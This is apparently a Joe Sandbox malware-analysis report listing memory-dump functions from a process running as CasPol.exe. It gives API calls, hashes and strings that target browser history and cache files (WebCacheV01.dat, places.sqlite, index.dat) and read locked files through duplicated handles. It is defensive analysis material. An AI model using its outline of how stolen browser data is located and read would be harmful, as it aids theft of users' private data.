                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                    • String ID: "%s"
                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2911713577-0
                                                                                                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                    APIs
                                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcmp
                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                    Strings
                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                    • API String ID: 2705122986-2036018995
                                                                                                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                    • String ID: /nosort$/sort
                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    Strings
                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                    • API String ID: 3354267031-2114579845
                                                                                                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3473537107-0
                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                    APIs
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                    • String ID: r!A
                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                    APIs
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1033339047-0
                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                    • String ID: $$8
                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1979745280-0
                                                                                                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                    • API String ID: 2641622041-467022611
                                                                                                                    • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                    • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839530781-0
                                                                                                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindFirst
                                                                                                                    • String ID: *.*$index.dat
                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1156039329-0
                                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397143404-0
                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1125800050-0
                                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                    • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
